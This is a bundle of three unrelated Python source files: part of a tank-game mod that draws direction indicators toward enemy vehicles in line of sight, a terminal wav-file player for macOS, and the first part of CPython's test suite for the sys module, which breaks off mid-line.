def on_vehicle_killed(self, target_id, attacker_id, equipment_id, reason):
_, _, _ = attacker_id, reason, equipment_id
if target_id in self.enemies_list:
self.disable_indicator(target_id)
if target_id == BigWorld.player().playerVehicleID:
self.clear_vars()
def disable_indicator(self, vehicle_id):
if vehicle_id in self.enemies_list:
if 'dir_indicator' in self.enemies_list[vehicle_id]: self.enemies_list[vehicle_id]['dir_indicator'].stop()
if 'distance' in self.enemies_list[vehicle_id] and self.enemies_list[vehicle_id]['distance'] < 10000: self.enemies_list[vehicle_id]['distance'] = 10000
def del_indicator(self, vehicle_id):
if vehicle_id in self.enemies_list:
if 'dir_indicator' in self.enemies_list[vehicle_id]:
self.enemies_list[vehicle_id]['dir_indicator'].close()
del self.enemies_list[vehicle_id]
def check_visible(self, slave):
player = BigWorld.player()
master = player.playerVehicleID
if self.add_observed_point(master) and self.add_observed_point(slave):
master_vehicle = player.arena.vehicles[master]['vehicleType']
slave_vehicle = player.arena.vehicles[slave]['vehicleType']
current_checkpoint = self.translation_points(slave, slave_vehicle.observer_pos_on_chassis)
if current_checkpoint:
current_observe = self.translation_points(master, master_vehicle.observer_pos_on_chassis)
if current_observe and BigWorld.wg_collideSegment(player.spaceID, current_observe, current_checkpoint, False) is None:
return True, current_observe, current_checkpoint
return False, current_observe, current_checkpoint
return False, None, None
def refresh_indicator(self):
aim_mode = BigWorld.player().inputHandler.aim.mode
for vehicle_id in self.enemies_list:
if self.get_is_on_arena(vehicle_id) and self.get_is_live(vehicle_id):
visible, observe, checkpoint = self.check_visible(vehicle_id)
if observe and checkpoint:
position = observe
if self.strategic_fear_mode and 'strategic' in aim_mode:
position = BigWorld.camera().position
self.enemies_list[vehicle_id]['distance'] = (position - checkpoint).length
if visible:
if self.secondary_indication:
if self.enemies_list[vehicle_id]['distance'] < self.max_distance_secondary_indication:
self.enemies_list[vehicle_id]['dir_indicator'].set_shape('purple' if self.red_to_purple_indication else 'red')
self.enable_indicator(vehicle_id, checkpoint)
elif self.primary_indication:
if self.enemies_list[vehicle_id]['distance'] < self.max_distance_primary_indication and vehicle_id in self.check_nearest_target():
self.enemies_list[vehicle_id]['dir_indicator'].set_shape('green')
self.enable_indicator(vehicle_id, checkpoint)
else: self.disable_indicator(vehicle_id)
else: self.disable_indicator(vehicle_id)
else: self.disable_indicator(vehicle_id)
else: self.disable_indicator(vehicle_id)
self.callback = BigWorld.callback(0.5, self.refresh_indicator)
def check_nearest_target(self):
return min(self.enemies_list.iterkeys(), key=(lambda key: self.enemies_list[key]['distance'])),
@staticmethod
def translation_points(vehicle_id, point):
try: return Matrix(BigWorld.entity(vehicle_id).model.matrix).applyPoint(point)
except StandardError: return
@staticmethod
def get_battle_on():
try:
if BigWorld.player().arena: return True
except StandardError: return False
return hasattr(BigWorld.player(), 'arena')
def get_is_on_arena(self, vehicle_id):
return self.get_battle_on() and vehicle_id in self.enemies_list
@staticmethod
def get_is_live(vehicle_id):
try: return BigWorld.player().arena.vehicles[vehicle_id]['isAlive']
except StandardError: return False
def get_is_friendly(self, vehicle_id):
player = BigWorld.player()
return self.get_battle_on() and player.arena.vehicles[player.playerVehicleID]['team'] == player.arena.vehicles[vehicle_id]['team']
# deformed functions:
def hook_update_all(self):
hooked_update_all(self)
config.analytics()
def hook_vehicle_on_enter_world(self, vehicle):
hooked_vehicle_on_enter_world(self, vehicle)
if config.enable: dir_ind.init_vehicle(vehicle.id)
def hook_vehicle_on_leave_world(self, vehicle):
hooked_vehicle_on_leave_world(self, vehicle)
if config.enable: dir_ind.fin_vehicle(vehicle.id)
def hook_start_battle(self):
hooked_start_battle(self)
dir_ind.start_battle()
def hook_stop_battle(self):
hooked_stop_battle(self)
dir_ind.stop_battle()
#start mod
config = Config()
config.load_mod()
dir_ind = DirIndication()
#hooked
# noinspection PyProtectedMember
hooked_update_all = Hangar._Hangar__updateAll
hooked_vehicle_on_enter_world = PlayerAvatar.vehicle_onEnterWorld
hooked_vehicle_on_leave_world = PlayerAvatar.vehicle_onLeaveWorld
hooked_start_battle = Battle.afterCreate
hooked_stop_battle = Battle.beforeDelete
#hook
# noinspection PyProtectedMember
Hangar._Hangar__updateAll = hook_update_all
PlayerAvatar.vehicle_onEnterWorld = hook_vehicle_on_enter_world
PlayerAvatar.vehicle_onLeaveWorld = hook_vehicle_on_leave_world
Battle.afterCreate = hook_start_battle
Battle.beforeDelete = hook_stop_battle
|
play.py
|
#!/usr/bin/env python3
import sys
import termios
import threading
from argparse import ArgumentParser
from glob import glob
from itertools import chain, count
from os import system
from subprocess import PIPE, Popen, STDOUT
from time import sleep
lock = threading.Lock()
action = None
play_process = None
def set_action(k, e):
global action
action = k
e.set()
def stop():
with lock:
global play_process
if play_process and play_process.poll() is None:
try:
play_process.kill()
except SystemError:
pass
def process_monitor(e):
global play_process
while True:
with lock:
if play_process and play_process.poll() is not None:
set_action('n', e)
sleep(1)
def play(track):
global play_process
stop()
print('Playing', track)
with lock:
play_process = Popen(['afplay', track], stdout=PIPE, stderr=STDOUT)
def get_action(e):
while True:
fd = sys.stdin.fileno()
oldterm = termios.tcgetattr(fd)
newattr = termios.tcgetattr(fd)
newattr[3] = newattr[3] & ~termios.ICANON & ~termios.ECHO
termios.tcsetattr(fd, termios.TCSANOW, newattr)
try:
c = sys.stdin.read(1)
set_action(str(c), e)
except IOError:
pass
termios.tcsetattr(fd, termios.TCSAFLUSH, oldterm)
def play_all(tracks):
global action
tracks = sorted(tracks)
keyed_tracks = list(
zip(
chain(range(97, 122), range(65, 90)),
[s.split('/')[-1] for s in tracks]))
e = threading.Event()
threading.Thread(target=get_action, args=(e,), daemon=True).start()
index = 0
threading.Thread(target=process_monitor, args=(e,), daemon=True).start()
play(tracks[index])
while action != 's':
e.wait()
e.clear()
if action == 'b':
play(tracks[index])
if action == 'c':
print('Currently playing', tracks[index])
if action == 'n':
index = (index + 1) % len(tracks)
play(tracks[index])
if action == 'p':
index = index - 1 if index > 0 else len(tracks) - 1
play(tracks[index])
if action == 's':
stop()
if action == 'l':
system('clear')
for i, p in keyed_tracks:
print(chr(i), p)
e.wait()
e.clear()
if action != chr(27): # Escape character
for i, entry in zip(count(0), keyed_tracks):
if chr(entry[0]) == action:
index = i
play(tracks[index])
action = ''
print('Done!')
def get_audio_files(path):
return glob(f'{path}/**/*.wav', recursive=True)
def parse_args(args):
parser = ArgumentParser(description='Play wav files on Mac')
parser.add_argument(
'-d', '--wav_dir', help='Directory containing Wav-files', default='.')
return parser.parse_args(args)
def main(wav_dir):
play_all(get_audio_files(wav_dir))
if __name__ == '__main__': # pragma: no cover
main(**parse_args(sys.argv[1:]).__dict__)
|
test_sys.py
|
import builtins
import codecs
import gc
import locale
import operator
import os
import struct
import subprocess
import sys
import sysconfig
import test.support
from test import support
from test.support import os_helper
from test.support.script_helper import assert_python_ok, assert_python_failure
from test.support import threading_helper
from test.support import import_helper
import textwrap
import unittest
import warnings
# count the number of test runs, used to create unique
# strings to intern in test_intern()
INTERN_NUMRUNS = 0
DICT_KEY_STRUCT_FORMAT = 'n2BI2n'
class DisplayHookTest(unittest.TestCase):
def test_original_displayhook(self):
dh = sys.__displayhook__
with support.captured_stdout() as out:
dh(42)
self.assertEqual(out.getvalue(), "42\n")
self.assertEqual(builtins._, 42)
del builtins._
with support.captured_stdout() as out:
dh(None)
self.assertEqual(out.getvalue(), "")
self.assertTrue(not hasattr(builtins, "_"))
# sys.displayhook() requires arguments
self.assertRaises(TypeError, dh)
stdout = sys.stdout
try:
del sys.stdout
self.assertRaises(RuntimeError, dh, 42)
finally:
sys.stdout = stdout
def test_lost_displayhook(self):
displayhook = sys.displayhook
try:
del sys.displayhook
code = compile("42", "<string>", "single")
self.assertRaises(RuntimeError, eval, code)
finally:
sys.displayhook = displayhook
def test_custom_displayhook(self):
def baddisplayhook(obj):
raise ValueError
with support.swap_attr(sys, 'displayhook', baddisplayhook):
code = compile("42", "<string>", "single")
self.assertRaises(ValueError, eval, code)
class ExceptHookTest(unittest.TestCase):
def test_original_excepthook(self):
try:
raise ValueError(42)
except ValueError as exc:
with support.captured_stderr() as err:
sys.__excepthook__(*sys.exc_info())
self.assertTrue(err.getvalue().endswith("ValueError: 42\n"))
self.assertRaises(TypeError, sys.__excepthook__)
def test_excepthook_bytes_filename(self):
# bpo-37467: sys.excepthook() must not crash if a filename
# is a bytes string
with warnings.catch_warnings():
warnings.simplefilter('ignore', BytesWarning)
try:
raise SyntaxError("msg", (b"bytes_filename", 123, 0, "text"))
except SyntaxError as exc:
with support.captured_stderr() as err:
sys.__excepthook__(*sys.exc_info())
err = err.getvalue()
self.assertIn(""" File "b'bytes_filename'", line 123\n""", err)
self.assertIn(""" text\n""", err)
self.assertTrue(err.endswith("SyntaxError: msg\n"))
def test_excepthook(self):
with test.support.captured_output("stderr") as stderr:
sys.excepthook(1, '1', 1)
self.assertTrue("TypeError: print_exception(): Exception expected for " \
"value, str found" in stderr.getvalue())
# FIXME: testing the code for a lost or replaced excepthook in
# Python/pythonrun.c::PyErr_PrintEx() is tricky.
class SysModuleTest(unittest.TestCase):
def tearDown(self):
test.support.reap_children()
def test_exit(self):
# call with two arguments
self.assertRaises(TypeError, sys.exit, 42, 42)
# call without argument
with self.assertRaises(SystemExit) as cm:
sys.exit()
self.assertIsNone(cm.exception.code)
rc, out, err = assert_python_ok('-c', 'import sys; sys.exit()')
self.assertEqual(rc, 0)
self.assertEqual(out, b'')
self.assertEqual(err, b'')
# call with integer argument
with self.assertRaises(SystemExit) as cm:
sys.exit(42)
self.assertEqual(cm.exception.code, 42)
# call with tuple argument with one entry
# entry will be unpacked
with self.assertRaises(SystemExit) as cm:
sys.exit((42,))
self.assertEqual(cm.exception.code, 42)
# call with string argument
with self.assertRaises(SystemExit) as cm:
sys.exit("exit")
self.assertEqual(cm.exception.code, "exit")
# call with tuple argument with two entries
with self.assertRaises(SystemExit) as cm:
sys.exit((17, 23))
self.assertEqual(cm.exception.code, (17, 23))
# test that the exit machinery handles SystemExits properly
rc, out, err = assert_python_failure('-c', 'raise SystemExit(47)')
self.assertEqual(rc, 47)
self.assertEqual(out, b'')
self.assertEqual(err, b'')
def check_exit_message(code, expected, **env_vars):
rc, out, err = assert_python_failure('-c', code, **env_vars)
self.assertEqual(rc, 1)
self.assertEqual(out, b'')
self.assertTrue(err.startswith(expected),
"%s doesn't start with %s" % (ascii(err), ascii(expected)))
# test that stderr buffer is flushed before the exit message is written
# into stderr
check_exit_message(
r'import sys; sys.stderr.write("unflushed,"); sys.exit("message")',
b"unflushed,message")
# test that the exit message is written with backslashreplace error
# handler to stderr
check_exit_message(
r'import sys; sys.exit("surrogates:\uDCFF")',
b"surrogates:\\udcff")
# test that the unicode message is encoded to the stderr encoding
# instead of the default encoding (utf8)
check_exit_message(
r'import sys; sys.exit("h\xe9")',
b"h\xe9", PYTHONIOENCODING='latin-1')
def test_getdefaultencoding(self):
self.assertRaises(TypeError, sys.getdefaultencoding, 42)
# can't check more than the type, as the user might have changed it
self.assertIsInstance(sys.getdefaultencoding(), str)
# testing sys.settrace() is done in test_sys_settrace.py
# testing sys.setprofile() is done in test_sys_setprofile.py
def test_switchinterval(self):
self.assertRaises(TypeError, sys.setswitchinterval)
self.assertRaises(TypeError, sys.setswitchinterval, "a")
self.assertRaises(ValueError, sys.setswitchinterval, -1.0)
self.assertRaises(ValueError, sys.setswitchinterval, 0.0)
orig = sys.getswitchinterval()
# sanity check
self.assertTrue(orig < 0.5, orig)
try:
for n in 0.00001, 0.05, 3.0, orig:
sys.setswitchinterval(n)
self.assertAlmostEqual(sys.getswitchinterval(), n)
finally:
sys.setswitchinterval(orig)
def test_recursionlimit(self):
self.assertRaises(TypeError, sys.getrecursionlimit, 42)
oldlimit = sys.getrecursionlimit()
self.assertRaises(TypeError, sys.setrecursionlimit)
self.assertRaises(ValueError, sys.setrecursionlimit, -42)
sys.setrecursionlimit(10000)
self.assertEqual(sys.getrecursionlimit(), 10000)
sys.setrecursionlimit(oldlimit)
def test_recursionlimit_recovery(self):
if hasattr(sys, 'gettrace') and sys.gettrace():
self.skipTest('fatal error if run with a trace function')
oldlimit = sys.getrecursionlimit()
def f():
f()
try:
for depth in (50, 75, 100, 250, 1000):
try:
sys.setrecursionlimit(depth)
except RecursionError:
# Issue #25274: The recursion limit is too low at the
# current recursion depth
continue
# Issue #5392: test stack overflow after hitting recursion
# limit twice
with self.assertRaises(RecursionError):
f()
with self.assertRaises(RecursionError):
f()
finally:
sys.setrecursionlimit(oldlimit)
@test.support.cpython_only
def test_setrecursionlimit_recursion_depth(self):
# Issue #25274: Setting a low recursion limit must be blocked if the
# current recursion depth is already higher than limit.
from _testinternalcapi import get_recursion_depth
def set_recursion_limit_at_depth(depth, limit):
recursion_depth = get_recursion_depth()
if recursion_depth >= depth:
with self.assertRaises(RecursionError) as cm:
sys.setrecursionlimit(limit)
self.assertRegex(str(cm.exception),
"cannot set the recursion limit to [0-9]+ "
"at the recursion depth [0-9]+: "
"the limit is too low")
else:
set_recursion_limit_at_depth(depth, limit)
oldlimit = sys.getrecursionlimit()
try:
sys.setrecursionlimit(1000)
for limit in (10, 25, 50, 75, 100, 150, 200):
set_recursion_limit_at_depth(limit, limit)
finally:
sys.setrecursionlimit(oldlimit)
def test_getwindowsversion(self):
# Raise SkipTest if sys doesn't have getwindowsversion attribute
test.support.get_attribute(sys, "getwindowsversion")
v = sys.getwindowsversion()
self.assertEqual(len(v), 5)
self.assertIsInstance(v[0], int)
self.assertIsInstance(v[1], int)
self.assertIsInstance(v[2], int)
self.assertIsInstance(v[3], int)
self.assertIsInstance(v[4], str)
self.assertRaises(IndexError, operator.getitem, v, 5)
self.assertIsInstance(v.major, int)
self.assertIsInstance(v.minor, int)
self.assertIsInstance(v.build, int)
self.assertIsInstance(v.platform, int)
self.assertIsInstance(v.service_pack, str)
self.assertIsInstance(v.service_pack_minor, int)
self.assertIsInstance(v.service_pack_major, int)
self.assertIsInstance(v.suite_mask, int)
self.assertIsInstance(v.product_type, int)
self.assertEqual(v[0], v.major)
self.assertEqual(v[1], v.minor)
self.assertEqual(v[2], v.build)
self.assertEqual(v[3], v.platform)
self.assertEqual(v[4], v.service_pack)
# This is how platform.py calls it. Make sure tuple
# still has 5 elements
maj, min, buildno, plat, csd = sys.getwindowsversion()
def test_call_tracing(self):
self.assertRaises(TypeError, sys.call_tracing, type, 2)
@unittest.skipUnless(hasattr(sys, "setdlopenflags"),
'test needs sys.setdlopenflags()')
def test_dlopenflags(self):
self.assertTrue(hasattr(sys, "getdlopenflags"))
self.assertRaises(TypeError, sys.getdlopenflags, 42)
oldflags = sys.getdlopenflags()
self.assertRaises(TypeError, sys.setdlopenflags)
sys.setdlopenflags(oldflags+1)
self.assertEqual(sys.getdlopenflags(), oldflags+1)
sys.setdlopenflags(oldflags)
@test.support.refcount_test
def test_refcount(self):
# n here must be a global in order for this test to pass while
# tracing with a python function. Tracing calls PyFrame_FastToLocals
# which will add a copy of any locals to the frame object, causing
# the reference count to increase by 2 instead of 1.
global n
self.assertRaises(TypeError, sys.getrefcount)
c = sys.getrefcount(None)
n = None
self.assertEqual(sys.getrefcount(None), c+1)
del n
self.assertEqual(sys.getrefcount(None), c)
if hasattr(sys, "gettotalrefcount"):
self.assertIsInstance(sys.gettotalrefcount(), int)
def test_getframe(self):
self.assertRaises(TypeError, sys._getframe, 42, 42)
self.assertRaises(ValueError, sys._getframe, 2000000000)
self.assertTrue(
SysModuleTest.test_getframe.__code__ \
is sys._getframe().f_code
)
# sys._current_frames() is a CPython-only gimmick.
@threading_helper.reap_threads
def test_current_frames(self):
import threading
import traceback
# Spawn a thread that blocks at a known place. Then the main
# thread does sys._current_frames(), and verifies that the frames
# returned make sense.
entered_g = threading.Event()
leave_g = threading.Event()
thread_info = [] # the thread's id
def f123():
g456()
def g456():
thread_info.append(threading.get_ident())
entered_g.set()
leave_g.wait()
t = threading.Thread(target=f123)
t.start()
entered_g.wait()
# At this point, t has finished its entered_g.set(), although it's
# impossible to guess whether it's still on that line or has moved on
# to its leave_g.wait().
self.assertEqual(len(thread_info), 1)
thread_id = thread_info[0]
d = sys._current_frames()
for tid in d:
self.assertIsInstance(tid, int)
self.assertGreater(tid, 0)
main_id = threading.get_ident()
self.assertIn(main_id, d)
self.assertIn(thread_id, d)
# Verify that the captured main-thread frame is _this_ frame.
frame = d.pop(main_id)
self.assertTrue(frame is sys._getframe())
# Verify that the captured thread frame is blocked in g456, called
# from f123. This is a little tricky, since various bits of
# threading.py are also in the thread's call stack.
frame = d.pop(thread_id)
stack = traceback.extract_stack(frame)
for i, (filename, lineno, funcname, sourceline) in enumerate(stack):
if funcname == "f123":
break
else:
self.fail("didn't find f123() on thread's call stack")
self.assertEqual(sourceline, "g456()")
# And the next record must be for g456().
filename, lineno, funcname, sourceline = stack[i+1]
self.assertEqual(funcname, "g456")
self.assertIn(sourceline, ["leave_g.wait()", "entered_g.set()"])
# Reap the spawned thread.
leave_g.set()
t.join()
@threading_helper.reap_threads
def test_current_exceptions(self):
import threading
import traceback
# Spawn a thread that blocks at a known place. Then the main
# thread does sys._current_frames(), and verifies that the frames
# returned make sense.
entered_g = threading.Event()
leave_g = threading.Event()
thread_info = [] # the thread's id
def f123():
g456()
def g456():
thread_info.append(threading.get_ident())
entered_g.set()
while True:
try:
raise ValueError("oops")
except ValueError:
if leave_g.wait(timeout=support.LONG_TIMEOUT):
break
t = threading.Thread(target=f123)
t.start()
entered_g.wait()
# At this point, t has finished its entered_g.set(), although it's
# impossible to guess whether it's still on that line or has moved on
# to its leave_g.wait().
self.assertEqual(len(thread_info), 1)
thread_id = thread_info[0]
d = sys._current_exceptions()
for tid in d:
self.assertIsInstance(tid, int)
self.assertGreater(tid, 0)
main_id = threading.get_ident()
self.assertIn(main_id, d)
self.assertIn(thread_id, d)
self.assertEqual((None, None, None), d.pop(main_id))
# Verify that the captured thread frame is blocked in g456, called
# from f123. This is a little tricky, since various bits of
# threading.py are also in the thread's call stack.
exc_type, exc_value, exc_tb = d.pop(thread_id)
stack = traceback.extract_stack(exc_tb.tb_frame)
for i, (filename, lineno, funcname, sourceline) in enumerate(stack):
if funcname == "f123":
break
else:
self.fail("didn't find f123() on thread's call stack")
self.assertEqual(sourceline, "g456()")
# And the next record must be for g456().
filename, lineno, funcname, sourceline = stack[i+1]
self.assertEqual(funcname, "g456")
self.assertTrue(sourceline.startswith("if leave_g.wait("))
# Reap the spawned thread.
leave_g.set()
t.join()
def test_attributes(self):
self.assertIsInstance(sys.api_version, int)
self.assertIsInstance(sys.argv, list)
for arg in sys.argv:
self.assertIsInstance(arg, str)
self.assertIsInstance(sys.orig_argv, list)
for arg in sys.orig_argv:
self.assertIsInstance(arg, str)
self.assertIn(sys.byteorder, ("little", "big"))
self.assertIsInstance(sys.builtin_module_names, tuple)
self.assertIsInstance(sys.copyright, str)
self.assertIsInstance(sys.exec_prefix, str)
self.assertIsInstance(sys.base_exec_prefix, str)
self.assertIsInstance(sys.executable, str)
self.assertEqual(len(sys.float_info), 11)
self.assertEqual(sys.float_info.radix, 2)
self.assertEqual(len(sys.int_info), 2)
self.assertTrue(sys.int_info.bits_per_digit % 5 == 0)
self.assertTrue(sys.int_info.sizeof_digit >= 1)
self.assertEqual(type(sys.int_info.bits_per_digit), int)
self.assertEqual(type(sys.int_info.sizeof_digit), int)
self.assertIsInstance(sys.hexversion, int)
self.assertEqual(len(sys.hash_info), 9)
self.assertLess(sys.hash_info.modulus, 2**sys.hash_info.width)
# sys.hash_info.modulus should be a prime; we do a quick
# probable primality test (doesn't exclude the possibility of
# a Carmichael number)
for x in range(1, 100):
self.assertEqual(
pow(x, sys.hash_info.modulus-1, sys.hash_info.modulus),
1,
"sys.hash_info.modulus {} is a non-prime".format(
sys.hash_info.modulus)
)
self.assertIsInstance(sys.hash_info.inf, int)
self.assertIsInstance(sys.hash_info.nan, int)
self.assertIsInstance(sys.hash_info.imag, int)
algo = sysconfig.get_config_var("Py_HASH_ALGORITHM")
if sys.hash_info.algorithm in {"fnv", "siphash24"}:
self.assertIn(sys.hash_info.hash_bits, {32, 64})
self.assertIn(sys.hash_info.seed_bits, {32, 64, 128})
if algo == 1:
self.assertEqual(sys.hash_info.algorithm, "siphash24")
elif algo == 2:
self.assertEqual(sys.hash_info.algorithm, "fnv")
else:
self.assertIn(sys.hash_info.algorithm, {"fnv", "siphash24"})
else:
# PY_HASH_EXTERNAL
self.assertEqual(algo, 0)
self.assertGreaterEqual(sys.hash_info.cutoff, 0)
self.assertLess(sys.hash_info.cutoff, 8)
self.assertIsInstance(sys.maxsize, int)
self.assertIsInstance(sys.maxunicode, int)
self.assertEqual(sys.maxunicode, 0x10FFFF)
self.assertIsInstance(sys.platform, str)
self.assertIsInstance(sys.prefix, str)
self.assertIsInstance(sys.base_prefix, str)
self.assertIsInstance(sys.platlibdir, str)
self.assertIsInstance(sys.version, str)
vi = sys.version_info
self.assertIsInstance(vi[:], tuple)
self.assertEqual(len(vi), 5)
self.assertIsInstance(vi[0], int)
self.assertIsInstance(vi[1], int)
self.assertIsInstance(vi[2], int)
self.assertIn(vi[3], ("alpha", "beta", "candidate", "final"))
self.assertIsInstance(vi[4], int)
self.assertIsInstance(vi.major, int)
self.assertIsInstance(vi.minor, int)
self.assertIsInstance(vi.micro, int)
self.assertIn(vi.releaselevel, ("alpha", "beta", "candidate", "final"))
self.assertIsInstance(vi.serial, int)
self.assertEqual(vi[0], vi.major)
self.assertEqual(vi[1], vi.minor)
self.assertEqual(vi[2], vi.micro)
self.assertEqual(vi[3], vi.releaselevel)
self.assertEqual(vi[4], vi.serial)
self.assertTrue(vi > (1,0,0))
self.assertIsInstance(sys.float_repr_style, str)
self.assertIn(sys.float_repr_style, ('short', 'legacy'))
if not sys.platform.startswith('win'):
self.assertIsInstance(sys.abiflags, str)
def test_thread_info(self):
info = sys.thread_info
self.assertEqual(len(info), 3)
self.assertIn(info.name, ('nt', 'pthread', 'solaris', None))
self.assertIn(info.lock, ('semaphore', 'mutex+cond', None))
def test_43581(self):
# Can't use sys.stdout, as this is a StringIO object when
# the test runs under regrtest.
self.assertEqual(sys.__stdout__.encoding, sys.__stderr__.encoding)
def test_intern(self):
global INTERN_NUMRUNS
INTERN_NUMRUNS += 1
self.assertRaises(TypeError, sys.intern)
s = "never interned before" + str(INTERN_NUMRUNS)
self.assertTrue(sys.intern(s) is s)
s2 = s.swapcase().swapcase()
self.assertTrue(sys.intern(s2) is s)
# Subclasses of string can't be interned, because they
# provide too much opportunity for insane things to happen.
# We don't want them in the interned dict and if they aren't
# actually interned, we don't want to create the appearance
# that they are by allowing intern() to succeed.
class S(str):
def __hash__(self):
return 123
self.assertRaises(TypeError, sys.intern, S("abc"))
def test_sys_flags(self):
self.assertTrue(sys.flags)
attrs = ("debug",
"inspect", "interactive", "optimize",
"dont_write_bytecode", "no_user_site", "no_site",
"ignore_environment", "verbose", "bytes_warning", "quiet",
"hash_randomization", "isolated", "dev_mode", "utf8_mode",
"warn_default_encoding")
for attr in attrs:
self.assertTrue(hasattr(sys.flags, attr), attr)
attr_type = bool if attr == "dev_mode" else int
self.assertEqual(type(getattr(sys.flags, attr)), attr_type, attr)
self.assertTrue(repr(sys.flags))
self.assertEqual(len(sys.flags), len(attrs))
self.assertIn(sys.flags.utf8_mode, {0, 1, 2})
def assert_raise_on_new_sys_type(self, sys_attr):
# Users are intentionally prevented from creating new instances of
# sys.flags, sys.version_info, and sys.getwindowsversion.
arg = sys_attr
attr_type = type(sys_attr)
with self.assertRaises(TypeError):
attr_type(arg)
with self.assertRaises(TypeError):
attr_type.__new__(attr_type, arg)
def test_sys_flags_no_instantiation(self):
self.assert_raise_on_new_sys_type(sys.flags)
def test_sys_version_info_no_instantiation(self):
self.assert_raise_on_new_sys_type(sys.version_info)
def test_sys_getwindowsversion_no_instantiation(self):
# Skip if not being run on Windows.
test.support.get_attribute(sys, "getwindowsversion")
self.assert_raise_on_new_sys_type(sys.getwindowsversion())
@test.support.cpython_only
def test_clear_type_cache(self):
sys._clear_type_cache()
def test_ioencoding(self):
env = dict(os.environ)
# Test character: cent sign, encoded as 0x4A (ASCII J) in CP424,
# not representable in ASCII.
env["PYTHONIOENCODING"] = "cp424"
p = subprocess.Popen([sys.executable, "-c", 'print(chr(0xa2))'],
stdout = subprocess.PIPE, env=env)
out = p.communicate()[0].strip()
expected = ("\xa2" + os.linesep).encode("cp424")
self.assertEqual(out, expected)
env["PYTHONIOENCODING"] = "ascii:replace"
p = subprocess.Popen([sys.executable, "-c", 'print(chr(0xa2))'],
stdout = subprocess.PIPE, env=env)
out = p.communicate()[0].strip()
self.assertEqual(out, b'?')
env["PYTHONIOENCODING"] = "ascii"
p = subprocess.Popen([sys.executable, "-c", 'print(chr(0xa2))'],
stdout=subprocess.PIPE, stderr=subprocess.PIPE,
env=env)
out, err = p.communicate()
self.assertEqual(out, b'')
self.assertIn(b'UnicodeEncodeError:', err)
self.assertIn(rb"'\xa2'", err)
env["PYTHONIOENCODING"] = "ascii:"
p = subprocess.Popen([sys.executable, "-c", 'print(chr(0xa2))'],
stdout=subprocess.PIPE, stderr=subprocess.PIPE,
env=env)
out, err = p.communicate()
self.assertEqual(out, b'')
self.assertIn(b'UnicodeEncodeError:', err)
self.assertIn(rb"'\xa2'", err)
env["PYTHONIOENCODING"] = ":surrogateescape"
p = subprocess.Popen([sys.executable, "-c", 'print(chr(0xdcbd))'],
stdout=subprocess.PIPE, env=env)
out = p.communicate()[0].strip()
self.assertEqual(out, b'\xbd')
@unittest.skipUnless(os_helper.FS_NONASCII,
'requires OS support of non-ASCII encodings')
@unittest.skipUnless(sys.getfilesystemencoding() == locale.getpreferredencoding(False),
'requires FS encoding to match locale')
def test_ioencoding_nonascii(self):
env = dict(os.environ)
env["PYTHONIOENCODING"] = ""
p = subprocess.Popen([sys.executable, "-c",
'print(%a)' % os_helper.FS_NONASCII],
stdout=subprocess.PIPE, env=env)
out = p.communicate()[0].strip()
self.assertEqual(out, os.fsencode(os_helper.FS_NONASCII))
@unittest.skipIf(sys.base_prefix != sys.prefix,
'Test is not venv-compatible')
def test_executable(self):
# sys.executable should be absolute
self.assertEqual(os.path.abspath(sys.executable), sys.executable)
# Issue #7774: Ensure that sys.executable is an empty string if argv[0]
# has been set to a non existent program name and Python is unable to
# retrieve the real program name
# For a normal installation, it should work without 'cwd'
# argument. For test runs in the build directory, see #7774.
python_dir = os.path.dirname(os.path.realpath(sys.executable))
p = subprocess.Popen(
["nonexistent", "-c",
'import sys; print(sys.executable.encode("ascii", "backslashreplace"))'],
executable=sys.executable, stdout=subprocess.PIPE, cwd=python_dir)
stdout = p.communicate()[0]
executable = stdout.strip().decode("ASCII")
p.wait()
self.assertIn(executable, ["b''", repr(sys.executable.encode("ascii", "backslashreplace"))])
def check_fsencoding(self, fs_encoding, expected=None):
self.assertIsNotNone(fs_encoding)
codecs.lookup(fs_encoding)
if expected:
self.assertEqual(fs_encoding, expected)
def test_getfilesystemencoding(self):
fs_encoding = sys.getfilesystemencoding()
if sys.platform == 'darwin':
expected = 'utf-8'
else:
expected = None
self.check_fsencoding(fs_encoding, expected)
def c_locale_get_error_handler(self, locale, isolated=False, encoding=None):
# Force the POSIX locale
env = os.environ.copy()
env["LC_ALL"] = locale
env["PYTHONCOERCECLOCALE"] = "0"
code = '\n'.join((
'import sys',
'def dump(name):',
' std = getattr(sys, name)',
' print("%s: %s" % (name, std.errors))',
'dump("stdin")',
'dump("stdout")',
'dump("stderr")',
))
args = [sys.executable, "-X", "utf8=0", "-c", code]
if isolated:
args.append("-I")
if encoding is not None:
env['PYTHONIOENCODING'] = encoding
else:
env.pop('PYTHONIOENCODING', None)
p = subprocess.Popen(args,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
env=env,
universal_newlines=True)
stdout, stderr = p.communicate()
return stdout
def check_locale_surrogateescape(self, locale):
out = self.c_locale_get_error_handler(locale, isolated=True)
self.assertEqual(out,
'stdin: surrogateescape\n'
'stdout: surrogateescape\n'
'stderr: backslashreplace\n')
# replace the default error handler
out = self.c_locale_get_error_handler(locale, encoding=':ignore')
self.assertEqual(out,
'stdin: ignore\n'
'stdout: ignore\n'
'stderr: backslashreplace\n')
# force the encoding
out = self.c_locale_get_error_handler(locale, encoding='iso8859-1')
self.assertEqual(out,
'stdin: strict\n'
'stdout: strict\n'
'stderr: backslashreplace\n')
out = self.c_locale_get_error_handler(locale, encoding='iso8859-1:')
self.assertEqual(out,
'stdin: strict\n'
'stdout: strict\n'
'stderr: backslashreplace\n')
# have no any effect
out = self.c_locale_get_error_handler(locale, encoding=':')
self.assertEqual(out,
'stdin: surrogateescape\n'
'stdout: surrogateescape\n'
'stderr: backslashreplace\n')
out = self.c_locale_get_error_handler(locale, encoding='')
self.assertEqual(out,
'stdin: surrogateescape\n'
'stdout: surrogateescape\n'
'stderr: backslashreplace\n')
def test_c_locale_surrogateescape(self):
self.check_locale_surrogateescape('C')
def test_posix_locale_surrogateescape(self):
self.check_locale_surrogateescape('POSIX')
def test_implementation(self):
# This test applies to all implementations equally.
levels = {'alpha': 0xA, 'beta': 0xB, 'candidate': 0xC, 'final': 0xF}
self.assertTrue(hasattr(sys.implementation, 'name'))
self.assertTrue(hasattr(sys.implementation, 'version'))
self.assertTrue(hasattr(sys.implementation, 'hexversion'))
self.assertTrue(hasattr(sys.implementation, 'cache_tag'))
version = sys.implementation.version
self.assertEqual(version[:2], (version.major, version.minor))
hexversion = (version.major << 24 | version.minor << 16 |
version.micro << 8 | levels[version.releaselevel] << 4 |
version.serial << 0)
self.assertEqual(sys.implementation.hexversion, hexversion)
# PEP 421 requires that .name be lower case.
self.assertEqual(sys.implementation.name,
